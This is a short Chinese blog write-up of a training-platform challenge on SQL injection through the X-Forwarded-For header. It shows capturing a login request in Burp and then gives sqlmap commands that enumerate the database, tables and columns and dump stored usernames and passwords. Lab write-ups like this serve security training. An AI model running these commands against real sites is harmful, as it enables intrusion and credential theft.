码迷,mamicode.com
首页 > 其他好文 > 详细

X-forwarded-for注入漏洞实战

时间:2019-10-21 09:32:24      阅读:81      评论:0      收藏:0      [点我收藏+]

标签:速度   end   pass   column   batch   map   lan   登录   alt   

1、掌握SQL注入的基本原理;
2、了解服务器获取客户端IP的方式;
3、了解SQL注入的工具使用;

 

随便输入用户名密码登录,提示有ip信息,根据题目的意思是信息是根据x-forwarded-for的纸变得,所以本题存在x-forwarded-for注入
1.首先打开burp抓包,添加x-forwarded-for:*,将raw的信息存为txt文件,如下图所示,速度比较慢,请耐心等待

技术图片

 

 

 

 

 

2:#sqlmap -r 1.txt --current-db --batch    //爆出数据库
3:#sqlmap -r 1.txt -D
webcalendar --tables //爆出表
4:#sqlmap -r 1.txt -D webcalendar -T user --columns //爆出列
5:#sqlmap -r 1.txt -D webcalendar -T user -C username,password --dump //爆出数据库用户名和密码


这是墨者平台的一道注入题




 

X-forwarded-for注入漏洞实战

标签:速度   end   pass   column   batch   map   lan   登录   alt   

原文地址:https://www.cnblogs.com/gusi/p/11711456.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!